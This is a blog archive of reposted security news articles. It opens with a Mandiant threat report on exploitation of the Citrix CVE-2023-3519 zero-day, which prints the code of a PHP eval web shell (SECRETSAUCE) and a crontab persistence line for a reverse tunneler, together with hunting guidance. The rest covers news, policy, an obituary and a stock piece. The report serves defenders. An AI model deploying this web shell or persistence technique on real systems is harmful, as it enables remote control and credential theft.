Category Archives: Internet Security
Exploitation of Citrix Zero-Day by Possible Espionage Actors (CVE … – Mandiant
Note: This is a developing campaign under active analysis. We will continue to add more indicators, hunting tips, and information to this blog post as needed.
Security and networking devices are "edge devices," meaning they are connected to the internet. If an attacker is successful in exploiting a vulnerability on these appliances, they can gain initial access without human interaction, which reduces the chances of detection. As long as the exploit remains undiscovered, the threat actor can reuse it to gain access to additional victims or reestablish access to targeted systems. Additionally, both edge devices and virtualization software are difficult to monitor and may not support endpoint detection and response (EDR) solutions or methods to detect modifications or collect forensic images, which further reduces the likelihood of detection and complicates attribution. Notably since at least 2021, cyber espionage threat actors have focused on edge devices, particularly security, networking, and virtualization technologies to gain persistent access to victim networks, while evading detection.
On July 18, Citrix released security bulletin CTX561482, which described vulnerabilities in Citrix Netscaler Application Delivery Controller (ADC) and Citrix Netscaler Gateway. One of the vulnerabilities, CVE-2023-3519, could allow an unauthenticated remote attacker to perform arbitrary code execution. This vulnerability was assigned a CVSS of 9.8. Citrix has stated that they have observed exploitation of this vulnerability in the wild. Mandiant is actively involved in investigations involving recently compromised ADC appliances that were fully patched prior to the July 18 patches to address CVE-2023-3519. Predominately used in the information technology industry, ADCs are a vital component of enterprise and cloud data centers in ensuring the continuous improvement and the availability, security, and performance of applications. ADCs provide functions that optimize the delivery of enterprise applications across the network.
Mandiant strongly recommends that organizations follow Citrixs advice to patch vulnerable appliances as soon as possible.Mandiant classifies CVE-2023-3519 as a high-risk vulnerability because it allows for remote code execution without any known offsets. While this vulnerability has been exploited in the wild, the exploit code is not yet publicly available. Mandiant recommends that organizations prioritize patching this vulnerability.
During analysis of the compromised appliance, Mandiant identified a simple PHP eval web shell located in /var/vpn/themes. The web shell had the earliest file system modified time of all the identified malware and was relatively compact (113 bytes). As a result, Mandiant assessed with moderate confidence that the web shell was placed on the system as part of the initial exploitation vector.
The threat actor used the web shell to modify the NetScaler configuration. In particular, they attempted to deactivate the NetScaler High Availability File Sync (nsfsyncd). Additionally, the threat actor attempted to remove processes from the Citrix Monitor configured within the file /etc/monitrcbefore finally killing the Monitor process. Shortly thereafter, various NetScaler logs recorded a critical failure, which resulted in the creation of the NetScaler Packet Processing Engine (NPPE) core dump three minutes after the exploitation attempt and the appliance restart. Mandiant analyzed this dump file and identified strings related to HTTP requests that occurred at the same time as the creation of the first web shell.
Based on code similarities, specifically the structure of the commands, Mandiant has high confidence these samples are related to exploitation of CVE-2023-3519. At the time of writing, there is no public proof of concept code for this vulnerability. To avoid potentially leaking details of how to exploit the vulnerability to other threat actors, Mandiant will not detail how the vulnerability was exploited. Some examples that follow may support triage when dealing with this activity. For example, within one POST request the threat actor took a number of actions:
The sequence of commands as extracted from the request is as follows (note in log files and crash dumps some characters may be URL encoded).
Mandiant identified additional web shells and malicious ELF files that the threat actor uploaded to the vulnerable appliance after initial exploitation. All of the web shells were observed in the /var/vpn/themes directory; however, there is no reason the threat actor could not create web shells in other public-facing directories. Mandiant observed two types of web shells:
Details on these web shells are included in the following section.
Moreover, the threat actor also installed a persistent tunneler on the appliance with a filename of the. The tunneler provided encrypted reverse TCP/TLS connections to a hard-coded command and control address. The tunneler was derived from the open-source ligolo-ng Github project. Mandiant believes the hard-coded address is victim specific. The attacker created a crontab entry for the `nobody` user to ensure the tunneler ran persistently.
30 02 * * * nohup /var/tmp/the &
The threat actor copied an additional tunneler, version 0.26.10 of the open-source NPS project, to the compromised appliance with filename npc. NPS is a fully-featured tunneler written in Go. It can be configured from the command line or with a configuration file. The tunneler also has the ability to instantiate a local file server, allowing the remote user to download files from the system.
Mandiant identified six unique web shells on an impacted Netscaler. These included:
The initial web shell identified on the impacted Netscaler was an eval web shell, info.php. The contents of info.php can be seen as follows:
The web shells prod.php, log.php, vpn.php, and logout.php, are part of the SECRETSAUCE family of web shells. These web shells are nearly identical, with the exception of the embedded RSA public key. SECRETSAUCE is a PHP web shell that receives commands via POST parameters and executes them on the device. The shell contains a hard-coded RSA public key that is used to decrypt the provided POST parameters before passing them to PHPs built-in evalfunction.
The code comprising the primary functionality of prod.php is included as follows:
class rsa{ public $key; public $a; public $cmd;
public function keys() { $this->key = << return $this->key; } public function run($a = NULL) { return @eval($a); } public function get($qs) { $this->cmd = $_POST[1]; $cmds = explode("|", $this->cmd); $pk = openssl_pkey_get_public(rsa::keys()); $this->cmd = ''; foreach ($cmds as $value) { if ($qs(rsa::decode($value), $de, $pk)) { $this->cmd .= $de; } } return $this->cmd; } public function decode($e = NULL) { return base64_decode($e); }} $z = new rsa();$z->run($z->get('openssl_public_decrypt')); The final web shell, config.php, was identified as a sample of REGEORG.NEO. REGEORG.NEO is a publicly available web shell and web shell generation tool intended as an improvement to the REGEORG project. REGEORG is a python utility and collection of web shells that when used together establish a SOCKS proxy on the system where the web shell was placed. Threat actors use REGEORG to tunnel activities from their systems into compromised networks. Given the scope and sophistication of this threat actor, Mandiant recommends that organizations rebuild any appliances that have been exploited. The ADC upgrade process overwrites some, but not all, of the directories where threat actors may create web shells, potentially leaving the appliance in a compromised state. Organizations should evaluate whether their ADC or Gateway appliance management ports require unrestricted Internet access. Limiting the Internet access to only necessary IP addresses (such as Citrix related addresses) would make post-exploitation activities of this and any future vulnerabilities more difficult. Additionally, Mandiant has observed the threat actor copying the ADC ns.conf file as well as keys stored on the file system that are used to encrypt secrets within the configuration file. Public tooling exists to decrypt the ns.confsecrets although Mandiant has not validated it works for the most recent appliance versions. Given these TTPs, Mandiant recommends that impacted organizations rotate all secrets stored in the configuration file as well as any private keys and certificates that may be used for TLS connections. Mandiant recommends hardening susceptible accounts in the domain to reduce the likelihood of credential exposure via Kerberoasting and to limit a potential threat actor's ability to obtain credentials for lateral movement throughout the environment. Mandiant recommends organizations use available logs and Endpoint Detection & Response (EDR) telemetry to hunt for authentication attempts sourced from Netscaler management addresses (NSIPs) to all endpoints in the environment. Mandiant observed authentication attempts by the threat actor sourced from NSIPs of impacted Netscalers both via Remote Desktop Protocol (RDP) logons and network logons to endpoints within the victim's environment. Additional information recorded in these events may capture both hostnames and IP addresses belonging to attacker infrastructure to further pivot and hunt for in the environment. It is unexpected and suspicious to observe traffic to the internal network and miscellaneous (non-Citrix) Internet IP addresses from the NSIP of an appliance. Rotate credentials for any impacted/targeted accounts identified in these attempts. Review relevant firewall logs for any network based indicators identified. Additionally, Mandiant observed the stringpwd;pwd;pwd;pwd;pwd;used within the exploit POST requests which can aid hunting. Also, prior to upload of the initial web shell, Mandiant identified requests by a Headless Chrome User Agent (executed via CLI) included as follows: Furthermore, Mandiant recommends review of HTTP error logs for potential crashes, which can be indicative of vulnerability exploitation. Mandiant observed LDAP queries sourced from NSIPs of impacted Netscalers in an attempt to identify accounts vulnerable to Kerberoasting. A sample query can be seen as follows: Mandiant recommends review of the following directories and subdirectories for the presence of web shells: In order to identify malicious ELF binaries, Mandiant recommends review of the/tmp/directory. Similarly, review of files with timestamps after the Netscaler was last patched is especially important. In review of NSPPE core (Netscaler Packet Processing Engine) dumps, Mandiant identified commands executed by the threat actor to redirect the contents ofns.conf,F1.key, andF2.keyto a renamed JavaScript file for exfiltration. Mandiant recommends reviewing relevant NSPPE core dumps in the/core/directory in order to identify similar activity. Rotation of the keys is recommended if similar activity is observed in NSPPE core dumps. Finally, Mandiant recommends review of/var/crontabs/nobodyfor scheduled execution of suspicious binaries. Mandiant identified a crontab for the aforementioned ELF tunneler, the. Mandiant cannot attribute this activity based on the evidence collected thus far, however, this type of activity is consistent with previous operations by China-nexus actors based on known capabilities and actions against Citrix ADCs in 2022. The evolution of the China-nexus cyber threat landscape has evolved to such an extent, that its ecosystem mirrors more closely that of financial crime clusters, with connections and code overlap not necessarily offering the comprehensive picture. Additionally, Mandiant has observed a preponderance of actors utilizing the combination of NPS proxy and REGEORG.NEO as having a China-nexus. Media reports indicate APT5 exploited a zero day vulnerability in Citrix ADC and Gateway devices allowing pre-authenticated remote code execution on vulnerable devices. Following that exploitation, the National Security Agency (NSA) published a report detailing APT5 capabilities against Citrix ADCs. In the report, NSA states targeting Citrix ADCs can facilitate illegitimate access to targeted organizations by bypassing normal authentication controls. NSA, in collaboration with partners, developed threat hunting guidance to provide steps organizations can take to look for possible artifacts of this type of activity. Mandiant tracks additional Chinese cyber espionage threat actors using botnets to obfuscate traffic between attackers and victim networks, including APT41, APT31, APT15, TEMP.Hex, and Volt Typhoon. Cyber espionage threat actors continue to target technologies that do not support endpoint detection and response (EDR) solutions such as firewalls, IoT devices, hypervisors and VPN technologies (e.g. Fortinet, SonicWall, Pulse Secure, and others). Mandiant has investigated dozens of intrusions at defense industrial base (DIB), government, technology, and telecommunications organizations over the years where suspected China-nexus groups have exploited zero-day vulnerabilities and deployed custom malware to steal user credentials and maintain long-term access to the victim environments. See the original post:
Exploitation of Citrix Zero-Day by Possible Espionage Actors (CVE ... - Mandiant
Google restricting internet access to some employees to reduce cyberattack risk – CNBC
A man walks through Google offices on January 25, 2023 in New York City.
Leonardo Munoz | Corbis News | Getty Images
Google on Wednesday is starting a new pilot program where some employees will be restricted to internet-free desktop PCs, CNBC has learned.
The company originally selected more than 2,500 employees to participate, but after receiving feedback, the company revised the pilot to allow employees to opt out, as well as opening it up to volunteers. The company will disable internet access on the select desktops, with the exception of internal web-based tools and Google-owned websites like Google Drive and Gmail. Some workers who need the internet to do their job will get exceptions, the company stated in materials.
In addition, some employees will have no root access, meaning they won't be able to run administrative commands or do things like install software.
Google is running the program to reduce the risk of cyberattacks, according to internal materials. "Googlers are frequent targets of attacks," one internal description viewed by CNBC stated. If a Google employee's device is compromised, the attackers may have access to user data and infrastructure code, which could result in a major incident and undermine user trust, the description added.
Turning off most internet access ensures attackers cannot easily run arbitrary code remotely or grab data, the description explained.
The program comes as companies face increasingly sophisticated cyberattacks.Last week, Microsoft said Chinese intelligence hacked into company email accounts belonging to two dozen government agencies, including the State Department, in the U.S. and Western Europe in a "significant" breach. Google has beenpursuingU.S. government contracts since launching a public sector division last year.
It also comes as Google, which is preparing a companywide rollout of various artificial intelligence tools, tries to boost its security. The company has also in recent months been striving harder to contain leaks.
"Ensuring the safety of our products and users is one of our top priorities," a Google spokesperson said in an emailed statement. "We routinely explore ways to strengthen our internal systems against malicious attacks."
Continued here:
Google restricting internet access to some employees to reduce cyberattack risk - CNBC
Kevin Mitnick, Hacker Who Eluded Authorities, Is Dead at 59 – The New York Times
Kevin Mitnick, who at the dawn of widespread internet usage in the mid-1990s became the nations archetypal computer hacker obsessive but clever, shy but mischievous and threatening to an uncertain degree and who later used his skills to become chief hacking officer of a cybersecurity firm, died on Sunday in Pittsburgh. He was 59.
Kathy Wattman, a spokeswoman for the cybersecurity company he partly owned, KnowBe4, said the cause was pancreatic cancer.
Described by The New York Times in 1995 as the nations most wanted computer outlaw, Mr. Mitnick was a fugitive for more than two years.
He was sought for gaining illegal access to about 20,000 credit card numbers, including some belonging to Silicon Valley moguls; causing millions of dollars in damage to corporate computer operations; and stealing software used for maintaining the privacy of wireless calls and handling billing information.
Ultimately, he was caught and spent five years in prison. Yet no evidence emerged that Mr. Mitnick used the files he had stolen for financial gain. He would later defend his activities as a high stakes but, in the end, harmless form of play.
Anyone who loves to play chess knows that its enough to defeat your opponent, he wrote in a 2011 memoir, Ghost in the Wires. You dont have to loot his kingdom or seize his assets to make it worthwhile.
At the time of Mr. Mitnicks capture, in February 1995, the computer age was still young; Windows 95 had not yet been released. The Mitnick Affair drove a fretful international conversation not just about hacking, but also about the internet itself.
As a media celebrity, the internet is now seriously overexposed, the Times columnist Frank Rich complained in March 1995, blaming the hoopla surrounding Mr. Mitnick.
Mr. Mitnicks most spectacular crimes were his attempts to evade capture by the authorities. In 1993, he gained control of phone systems in California that enabled him to wiretap the F.B.I. agents pursuing him and confuse their efforts to track him. At one point they raided what they thought was Mr. Mitnicks home, only to find there a Middle Eastern immigrant watching TV.
On another occasion, using a radio scanner and software, Mr. Mitnick discovered that F.B.I. agents were closing in on him. He fled his apartment, and when the authorities arrived, they found a box of doughnuts waiting for them.
Mr. Mitnick ran into trouble on Christmas Day 1994, when he stole emails from a fellow hacker named Tsutomu Shimomura and taunted him. When he learned of the attack, Mr. Shimomura suspended a cross-country ski trip he was on and volunteered to help track down Mr. Mitnick.
What The Times called a duel on the net ensued. Mr. Mitnick was the amoral savant, praising the tech skills of his adversary, while Mr. Shimomura was the freelance gunslinger with a conscience, accusing Mr. Mitnick of violating the codes of the online community.
This kind of behavior is unacceptable, he told The Times.
Mr. Shimomura, using software he had designed that reconstructed a users computer sessions, along with cellphone scanning equipment, proceeded to locate Mr. Mitnick.
Mr. Mitnick was finally captured by the F.B.I. and charged with the illegal use of a telephone access device and computer fraud. He allegedly had access to corporate trade secrets worth millions of dollars, Kent Walker, an assistant U.S. attorney in San Francisco, said at the time. He was a very big threat.
In 1998, while Mr. Mitnick awaited sentencing, a group of supporters commandeered The Timess website for several hours, forcing it to shut down. A Times technology reporter, John Markoff, also became part of the imbroglio, reporting soon after the arrest that Mr. Mitnick had gained access to Mr. Markoffs email as revenge for Mr. Markoffs reporting on his activities.
Mr. Mitnick reached plea agreements in 1996 and 1999, which included pleading guilty to computer and wire fraud. He was released from prison in 2000 on the condition that he refrain from using a computer or cellphone for three years without the permission of his probation officer.
After leaving prison, Mr. Mitnick read out a statement of self-defense. My crimes were simple crimes of trespass, he said. My case is a case of curiosity.
Kevin David Mitnick was born in the Van Nuys section of Los Angeles on Aug. 6, 1963, and grew up in that city. His parents, Alan Mitnick and Shelly Jaffee, divorced when he was 3 years old, and he was raised by his mother, a waitress.
Mr. Mitnick was a heavyset and lonely boy who, by the age of 12, had figured out how to freely ride the bus using a $15 punch card and blank tickets fished from a dumpster. In high school he developed an obsession with the inner workings of the switches and circuits of telephone companies. He pulled pranks at a high level, managing to program the home phone of someone he did not like so that each time the line was answered, a recording asked for a deposit of 25 cents.
He showed a willingness to violate the law flagrantly, breaking into a Pacific Bell office as a teenager and stealing technical manuals.
In the late 1980s, he was convicted twice of hacking into corporate computer systems, leading to time in prison and counseling for addiction to computers.
Yet Mr. Mitnick often took a surprisingly old-fashioned approach to high-tech thievery. He frequently impersonated authority figures over the phone and in email, persuading low-level company officials to hand over passwords that gave him access to secret information.
Mr. Mitnicks first marriage, in his early 20s, ended quickly in divorce. In 2015, he met Kimberly Barry at a cybersecurity conference in Singapore, and the two soon began dating. They married last year, after he learned of his cancer diagnosis. She survives him and is pregnant with his first child.
The year Mr. Mitnick was released, The Times reported on an unusual arrangement in which he was hired by a California college he had victimized to consult on cybersecurity. Mr. Mitnick called it hire the hacker.
Now it is commonplace for hackers to find work by exposing the vulnerabilities of governments and corporations. KnowBe4, the company Mr. Mitnick partly owned, describes itself as the provider of the worlds largest security awareness training. The company says that a cybersecurity training curriculum that Mr. Mitnick designed is used by more than 60,000 organizations.
Writing in The New York Times Book Review about data privacy, the journalist and author Amy Webb in 2017 identified that once-hunted hacker with an epithet that would have baffled members of law enforcement and newspaper readers in the 1990s: the internet security expert Kevin Mitnick.
Livia Albeck-Ripka and Orlando Mayorquin contributed reporting.
Link:
Kevin Mitnick, Hacker Who Eluded Authorities, Is Dead at 59 - The New York Times
US government launches the Cyber Trust Mark, its long-awaited IoT security labeling program – TechCrunch
Image Credits: Javier Zayas Photography / Getty Images
The Biden administration has launched its long-awaited Internet of Things (IoT) cybersecurity labeling program that aims to protect Americans against the myriad security risks associated with internet-connected devices.
The program, officially named the U.S. Cyber Trust Mark, aims to help Americans ensure they are buying internet-connected devices that include strong cybersecurity protections against cyberattacks.
The Internet of Things, a term encompassing everything from fitness trackers and routers to baby monitors and smart refrigerators, has long been considered a weak cybersecuritylink. Many devices ship with easy-to-guess default passwords and offer a lack of security regular updates, putting consumers at risk of being hacked.
The Biden administration says its voluntary Energy Star-influenced labeling system will raise the bar for IoT security by enabling Americans to make informed decisions about the security credentials of the internet-connected devices they buy. The U.S. Cyber Trust Mark will take the form of a distinct shield logo, which will appear on products that meet established cybersecurity criteria.
This criterion, established by the National Institute of Standards and Technology (NIST), will require, for example, that devices require unique and strong default passwords, protect both stored and transmitted data, offer regular security updates and ship with incident detection capabilities.
The full list of standards is not yet finalized. The White House said that NIST will immediately start work on defining cybersecurity standards for higher-risk consumer-grade routers, devices that attackers frequently targetto steal passwords and create botnets that can be used to launch distributed denial-of-service (DDoS) attacks. This work will be completed by the end of 2023, with the aim that the initiative will cover these devices when it launches in 2024.
In a call with reporters, the White House confirmed that the Cyber Trust Mark will also include a QR code that will link to a national registry of certified devices and provide up-to-date security information, such as software updating policies, data encryption standards and vulnerability remediation.
We knew that we didnt want to create a label that said this product had been certified and secured and then stayed secure forever, a senior administration official said. The QR code will give you up-to-date information on the ongoing adherence to cyber security standards.
U.S. retailers will also be encouraged to prioritize labeled products when placing them in stores and online, the White House said, and a number have already signed up to the initiative, including Amazon and Best Buy. Otherbig-name tech firms that already agreed to the voluntary labeling initiative include Cisco, Google, LG, Qualcomm and Samsung.
While the initiative will initially focus on high-risk consumer devices, the U.S. Department of Energy announced on Tuesday that it is working with industry partners to develop cybersecurity labeling requirements for smart meters and power inverters.
See more here:
US government launches the Cyber Trust Mark, its long-awaited IoT security labeling program - TechCrunch
Continual Improvement In The Key To Optimum Cyber Security – CIO Applications
Eric Lovell, Senior Director, It/Cyber Security Risk, Ally
And from a risk perspective (with few exceptions), cyber security relevant information technology aligned metrics are at the top of the mind for boards, end users, and every stakeholder group.
I would hazard to guess that at any organization, cyber security metrics of some type are being collected, tracked, and communicated. Some organizations have robust, well managed programs; others may take a minimalist approach, only tracking a handful of items because leadership demands accountability for basic things with direct and obvious business impact.
In regulated industries, such as financial services, there is an expectation that their entire digital presence should be secure and well managed. For many firms, the identification, collection, tracking, and reporting of metrics, rather than an ancillary process, is a fundamental organizational capability with measurable value for all stakeholders.
In my experience, even a cursory review of industry specific regulatory, academic, and authoritative cyber security standards and/or research products produced by organizations such as the Center for Internet Security, and the National Institute of Standards and Technology, like a mature cyber risk management metrics program has the following characteristics:
1.Both retrospective and prospective/actionable
2.Comprehensive in scope but limited in number
3.Clear, concise, and of adequate frequency to provide expected benefits
4.Authoritative, both internally and externally
The rest is here:
Continual Improvement In The Key To Optimum Cyber Security - CIO Applications
3 Top Stocks From the Flourishing Security and Safety Services Industry – Yahoo Finance
The Zacks Security and Safety Services industry is poised to benefit from strong demand for security and safety solutions prompted by growing concerns of terrorist and criminal activities and the need to safeguard citizens and infrastructure. Improving supply chains and a deceleration in inflation augur well for the industrys near-term prospects.
Companies like Johnson Controls International JCI, Brady Corporation BRC and Lakeland Industries LAKE are poised to take advantage of the buoyancy in the industry.
About the Industry
The Zacks Security and Safety Services industry comprises companies that provide sophisticated and interactive security solutions and related services, which are meant to be used for residential, commercial and institutional purposes. A few industry players develop electrical weapons for personal defense, as well as military, federal, law enforcement and private security. Some of them provide solutions for the recovery of stolen vehicles, wireless communication devices, equipment for the safety of facility infrastructure and employees, and products for detecting hazards. A few companies provide a variety of services to automobile owners and insurance companies. The industry serves customers belonging to various end markets, including manufacturing, electronics, hospitality, education, construction, telecommunications, aerospace and medical.
3 Trends Shaping the Future of the Security and Safety Services Industry
Demand for Security and Safety Services: Growing concerns of terrorism and criminal activities around the world are promoting demand for security and safety services. Political unrest across countries, prompting governments to safeguard citizens and protect infrastructure, acts as a key growth driver for the industry. With growing urbanization, governments are increasingly focusing on the safety and security of people, assets and the like, thus driving demand in the industry. Thanks to rising instances of hacking, the industry is seeing growing demand for Internet security products and services like firewalls and unified threat management. Increasing efforts directed toward ensuring safe infrastructure in smart cities bode well for the industry.
Improving Supply Chains: While supply chain disruptions persist, the situation has improved significantly, as evident from the Institute for Supply Management reports Supplier Deliveries Index, which reflected faster deliveries for the eighth straight month in June. This is expected to drive the industrys growth in 2023. A reduction in raw material costs, thanks to the deceleration in inflation, should support the bottom line of industry players.
High Debt Levels: To stay competitive and keep up with changing customer needs, industry players constantly focus on upgrading and developing new products. While this augurs well for the industrys long-term growth, hefty investments in research and development often leave companies with highly leveraged balance sheets.
Story continues
Zacks Industry Rank Indicates Bright Prospects
The Zacks Security and Safety Services industry, housed within the broader Industrial Products sector, currently carries a Zacks Industry Rank #67. This rank places it in the top 27% of more than 250 Zacks industries.
The groups Zacks Industry Rank, which is basically the average of the Zacks Rank of all the member stocks, indicates solid near-term prospects. Our research shows that the top 50% of the Zacks-ranked industries outperforms the bottom 50% by a factor of more than two to one.
The industrys positioning in the top 50% of the Zacks-ranked industries is a result of the positive earnings outlook for the constituent companies in aggregate. The Zacks Consensus Estimate for the groups 2023 earnings per share has increased 8.5% in the past year.
Given the bullish near-term prospects of the industry, we will present a few stocks that you may want to consider for your portfolio. But it is worth taking a look at the industrys shareholder returns and its current valuation first.
Industry Outperforms Sector & S&P 500
The Zacks Security and Safety Services industry has outperformed both the broader sector and the Zacks S&P 500 composite index over the past year.
Over this period, the industry has rallied 25.4% compared with the sector and the S&P 500 Indexs increase of 21.4% and 13.9%, respectively.
Industry's Current Valuation
On the basis of forward P/E (F12M), which is a commonly used multiple for valuing security and safety services stocks, the industry is currently trading at 19.52X compared with the S&P 500s 20.10X. However, it exceeds the sectors P/E (F12M) ratio of 17.11X.
Over the past five years, the industry has traded as high as 27.04X, as low as 10.38X and at the median of 18.68X, as the chart below shows:
3 Security and Safety Services Stocks to Buy
Each of the companies mentioned below presently carries a Zacks Rank #2 (Buy). You can see the complete list of todays Zacks #1 Rank (Strong Buy) stocks here.
Johnson Controls: A diversified technology company and a multi-industrial leader, Johnson Controls is involved in the creation of intelligent buildings, providing efficient energy solutions and integrated infrastructure. A robust demand environment, pricing actions and cost-control initiatives are expected to drive JCIs growth. Continued improvement in HVAC & Controls and strength in the Fire & Security are key catalysts to the companys growth.
The Zacks Consensus Estimate for Johnson Controls fiscal 2023 (ending September 2023) earnings has been revised upward by 2.6% in the past 90 days. Shares of the company have gained 8.6% in the year-to-date period.
Brady: The company offers complete identification solutions that help companies improve productivity, performance, safety and security. Brady is gaining from its continued focus on product development and innovation. Inorganic activities position BRC well for future growth.The Zacks Consensus Estimate for Bradys fiscal 2023 (ending July 2023) and fiscal 2024 earnings has been revised by 1.4% each in the past 90 days. Shares of the company have gained around 7% in the year-to-date period.
Lakeland Industries: The company manufactures industrial protective clothing and accessories for the industrial and public protective clothing market. LAKE is benefiting from significant contributions from the acquisition of Eagle Technical Products, which has expanded the companys fire service protective clothing division. Improved product mix and cost-control measures should fuel the companys growth. Reduction in raw material costs and manufacturing expenses should bolster LAKEs bottom line.
The Zacks Consensus Estimate for Lakeland Industries fiscal 2024 (ending January 2024) earnings has been revised upward by 9.4% in the past 90 days. Shares of the company have appreciated 15.1% in the year-to-date period.
Want the latest recommendations from Zacks Investment Research? Today, you can download 7 Best Stocks for the Next 30 Days. Click to get this free report
Johnson Controls International plc (JCI) : Free Stock Analysis Report
Brady Corporation (BRC) : Free Stock Analysis Report
Lakeland Industries, Inc. (LAKE) : Free Stock Analysis Report
To read this article on Zacks.com click here.
Zacks Investment Research
Read the original post:
3 Top Stocks From the Flourishing Security and Safety Services Industry - Yahoo Finance
Apple warning it could shut FaceTime, iMessage in UK over govt surveillance policy adds to growing tech industry discontent – TechCrunch
We havent been able to confirm the substance of the BBCs reporting with Apple which did not respond when we contacted it with questions about the story. However the tech giant recently elected to brief the broadcaster on its displeasure at another piece of (incoming) UK digital regulation hitting out in a statement last month at the Online Safety Bill (OSB) as a risk to encryption.
In making critical remarks public Apple joined a number of major tech services that had already been warning over powers contained in the draft legislation they say could enable the Internet regulator to order platforms to remove strong encryption.
Of particular concern is a government amendment last year that put the bill on a direct collision course with E2EE by proposing the regulator, Ofcom, should have powers to force platforms to scan messages for child sexual abuse content (CSAM) which, in the case of E2EE services, would likely require they implement client-side scanning by default (or otherwise backdoor encryption).
Privacy and security experts have lined up to warn over the security risks of such an approach.
As have other E2EE comms providers, including WhatsApp and Signal who have suggested they would either stop offering service in the UK or else wait to be blocked by authorities rather than comply with a law they believe will compromise the security of all their users.
The online encyclopedia Wikipedia is another high profile critic. It, too, has suggested it could exit the UK if the government doesnt rethink its approach.
Wikipedias concern for its service focuses on measures in the OSB related to age-gating and content censorship ostensibly for child protection which its founder, Jimmy Wales, has attacked as being bad for human rights, bad for Internet safety and simply bad law.
We would definitely not age gate nor selectively censor articles under any circumstances, Wales told TechCrunch when asked to confirm Wikipedias position on the legislation, adding: Weve chosen to be blocked in China and Turkey and other places rather than censor Wikipedia, and this is not different.
Despite the cavalcade of mainstream tech industry and expert criticism fired at the OSB ministers have so far only entrenched their position, claiming the legislation is a vital tool to fight CSAM and will also boost protections for children and other vulnerable web users.
Even concerns raised by the director of the research group selected by the government for a technical evaluation of a handful of safety tech projects given public funding back in 2021, as part of a Home Office competition to develop technology which can detect CSAM on E2EE services without comprising privacy, does not appear to have given ministers pause for thought.
The issue is that the technology being discussed is not fit as a solution, Awais Rashid, professor of cyber security at the University of Bristol and director of the Rephrain Centre, warned in a university press release earlier this month. Our evaluation shows that the solutions under consideration will compromise privacy at large and have no built-in safeguards to stop repurposing of such technologies for monitoring any personal communications.
Nor are there any mechanisms for ensuring transparency and accountability of who will receive this data and for what purposes will it be utilised. Parliament must take into account the independent scientific evidence in this regard. Otherwise the Online Safety Bill risks providing carte blanche for monitoring personal communications and potential for unfettered surveillance on a societal scale.
The governments willingness to ignore OSB critics may boil down to popular support based on its framing of the legislation as a vital child safety intervention.
Opposition to the bill within parliament has also been limited, with the opposition Labour Party broadly falling in behind the government to support the bill. Peers in the second chamber have also failed to respond to last minute calls to amend the legislation to ensure encryption is safe.
Following a final debate in the Lords last night, the Open Rights Group issued a statement warning there had been no progress in ensuring the bill could not compromise encryption:
As it stands, the Online Safety Bill will give Ofcom the power to ask tech companies to scan our private messages on the governments behalf. Despite having cross party support, the opposition withdrew an amendment that would at least ensure judges have oversight over these powers for government-mandated surveillance.
The government claims it will protect encryption but has still not provided detail about how this is possible if these powers are enacted. It is now left to tech companies, who may have to deal with notices asking them to weaken the security of their products.
The bill still has to pass through final stages which could include consideration of further amendments. But time is running out for the government to avoid a direct collision course with mainstream E2EE tech platforms. So far its preferred the fudge of claiming Ofcom would simply never ask E2EE companies to break their encryption without providing legal certainty by specifying that in the bill.
The government took a similarly fuzzy approach to encryption in the IPA which did not make it explicitly clear whether the law was essentially outlawing comms providers from using E2EE by containing powers were they could be mandated to hand over decrypted data. So there is something of a pattern in UK tech policymaking, over the past several years, where it touches strong encryption.
As for the planned changes to further extend the IPA notice regime, it remains to be seen whether Apples biggest threat yet to yank FaceTime and iMessage out of the UK gives government ministers cold feet or not.
Intelligence agency surveillance powers arent likely to be quite so easy to sell to the British public as populist claims to be clamping down on Big Tech to protect kids. But its notable that the Home Office statement in response to Apples threat cites catching child sex abusers as one of the missions the IPA was designed for.
See original here:
Apple warning it could shut FaceTime, iMessage in UK over govt surveillance policy adds to growing tech industry discontent - TechCrunch
Reducing Security Debt in the Cloud – Dark Reading
Debt is a big topic of discussion these days household debt in inflationary times, tax debt following the income tax filing deadline, the debate over raising the government's debt ceiling. But one kind of debt that can haunt organizations long term doesn't get as much attention: security debt.
Just like not doing what needs to be done in time can leave you behind on your taxes or your bills and piles on interest, leaving your cybersecurity by the wayside as you build your organization can cost you more in the long term. When you don't put the building blocks in place early and pay for things upfront, the overall debt will grow as time marches on.
Many organizations deploy applications without incorporating security into the development life cycle. As a result, they often must go back and reengineer the software down to its fundamental building blocks because of inherent security flaws, which costs exponentially more than if they had built in those security checks early on.
The growth in cloud services and the move of more operations to the cloud only magnifies this effect. Since cloud applications can be spun up by anyone with a credit card, developers can potentially put valuable data and business assets at risk. Before the cloud, if a business unit wanted to deploy a new application, it would have to engage the IT organization, generally ensuring some level of security oversight. Today, a business unit can outsource the development of a custom environment on any cloud platform, without IT. Additionally, when IT and the information security team finds out about these assets, they often have limited visibility into the cloud infrastructure and configuration.
With companies constantly scrambling to build and deploy apps faster using cloud infrastructure-as-a-service platforms, security debt can mount faster than credit card charges in the drive to be agile. Obviously, the worst-case scenario of security debt is a breach a ransomware attack, vandalism, theft, or some other attack but there are many other casualties of security debt that can also be quantified. For example, the costs of reengineering security after the fact for compliance in highly regulated industries such as retail and finance can be substantial. Meanwhile, regulators are increasingly willing to lay down fines and penalties for companies that suffered data breaches because their security was noncompliant and insufficient.
Establishing baselines and aligning with some basic security frameworks can be useful tools to prevent the buildup of security debt. A security program assessment (SPA) can look holistically across multiple domains of security including security awareness, vulnerability management or identity and access management and evaluate best practices in any one of those domains to give an overall assessment against industry-specific best practices. The Center for Internet Security (CIS), for example, provides valuable control and benchmark guidelines.
Aligning with one of those frameworks accomplishes a similar role for cyber defenses as a building code does in construction, getting the organization to a baseline of safety practices that can prevent a catastrophe. The building code will not get you the fanciest mansion, but it will produce a safe home; in the same way, having a cyber baseline will provide the basic minimum benchmark for safety.
Just like building codes vary geographically hurricanes are a bigger concern in Florida than Maine the baselines for data security vary by industry. A retailer may be more concerned about complying with the Payment Card Industry (PCI) Data Security Standard, while other industries may be more concerned with meeting the baseline set by the National Institute of Standards and Technology (NIST) and its Cyber Security Framework (CSF).
Aligning with a security framework provides some guidance on best practices, but an organization needs to fine-tune the guidelines for their unique environment and requirements. Here are some recommendations for preventing security debt in the cloud:
Security debt exists in traditional on-premises data centers as well as newer cloud platforms. Preventing it from accumulating in the cloud, however, requires a different set of skills, processes, and tools. Following the recommendations above can help pay down existing security debt before the next big breach, and avoid racking up new ones.
Read this article:
Reducing Security Debt in the Cloud - Dark Reading
Districts, Take Note: Privacy Is Rare in Apps Used in Schools – Education Week
Schools are falling short on vetting the apps and internet services they require or recommend that students use.
Thats among the findings of a comprehensive analysis of school technology practices by Internet Safety Labs, a nonprofit group that researchers tech product safety.
